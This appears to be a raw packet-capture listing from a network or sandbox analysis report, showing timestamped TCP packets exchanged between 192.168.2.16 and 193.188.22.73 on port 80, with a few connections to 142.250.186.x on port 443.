                                                                                                                                                                                            Nov 18, 2024 21:01:18.956000090 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956012011 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956016064 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956032991 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956062078 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956098080 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956787109 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956804991 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956813097 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956828117 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956844091 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956857920 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956861019 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956876993 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956876993 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956896067 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956912041 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956912041 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956931114 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956940889 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956948996 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.956979990 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.957642078 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.957659006 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.957674980 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.957693100 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.957695007 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.957709074 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.957726002 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.957731962 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.957750082 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958189011 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958206892 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958225012 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958240032 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958242893 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958260059 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958281994 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958288908 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958297968 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958311081 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958317995 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958334923 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958338976 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958353043 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958369017 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958383083 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958457947 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.958957911 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959114075 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959130049 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959146023 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959163904 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959180117 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959191084 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959191084 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959197998 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959214926 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959233046 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959240913 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959249020 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959258080 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959266901 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.959292889 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960002899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960020065 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960036039 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960052967 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960062981 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960068941 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960083008 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960087061 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960104942 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960114956 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960120916 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960139036 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960150003 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960155964 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960174084 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960191965 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960191965 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960227966 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960911036 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960928917 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960944891 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960962057 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960972071 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960978985 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960994959 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.960997105 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.961015940 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.961026907 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.961061954 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.008923054 CET49941443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:19.008970976 CET44349941142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.009066105 CET49941443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:19.009244919 CET49941443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:19.009262085 CET44349941142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.015489101 CET49942443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:19.015521049 CET44349942142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.015595913 CET49942443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:19.015960932 CET49942443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:19.015973091 CET44349942142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.184582949 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.184678078 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.259841919 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.259947062 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265441895 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265515089 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265571117 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265575886 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265609980 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265645027 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265674114 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265678883 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265717983 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265742064 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265929937 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265966892 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.265994072 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266002893 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266037941 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266073942 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266073942 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266129017 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266382933 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266437054 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266470909 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266499043 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266505003 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266540051 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266576052 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266592979 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266611099 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266621113 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266647100 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266680956 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266700983 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266717911 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.266776085 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267218113 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267287016 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267340899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267350912 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267458916 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267497063 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267515898 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267533064 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267568111 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267592907 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267602921 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267637968 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267658949 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267672062 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267709017 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.267734051 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268073082 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268127918 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268131971 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268162966 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268203974 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268218040 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268239975 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268275023 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268296003 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268311024 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268345118 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268366098 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268421888 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268476963 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268711090 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268745899 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.268801928 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269069910 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269105911 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269141912 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269160032 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269176006 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269228935 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269431114 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269469023 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269504070 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269525051 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269539118 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269572973 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269588947 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269608021 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269642115 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269660950 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269885063 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269967079 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.269969940 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270004988 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270039082 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270062923 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270075083 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270132065 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270323992 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270404100 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270438910 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270457983 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270474911 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270509005 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270545006 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270550013 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270607948 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270800114 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270880938 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270915985 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270939112 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270951033 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.270988941 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271009922 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271023989 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271084070 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271270990 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271306992 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271361113 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271370888 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271395922 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271430969 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271451950 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271466970 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271523952 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271806002 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271841049 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271877050 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271898985 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271912098 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271949053 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271970987 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.271984100 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272017002 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272048950 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272052050 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272114992 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272294998 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272330999 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272366047 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272387028 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272727966 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272744894 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272762060 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272778034 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272780895 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272794962 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272811890 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272819996 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272829056 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272839069 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272846937 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272861958 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272877932 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272891998 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272895098 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272914886 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.272958040 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273832083 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273849010 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273864985 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273880005 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273896933 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273904085 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273914099 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273930073 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273933887 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273945093 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273962021 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273962975 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273978949 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.273993969 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274002075 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274010897 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274022102 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274029016 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274045944 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274063110 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274075031 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274118900 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274254084 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274271965 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274311066 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274411917 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274429083 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274445057 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274461031 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274465084 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274477959 CET8049940193.188.22.73192.168.2.16
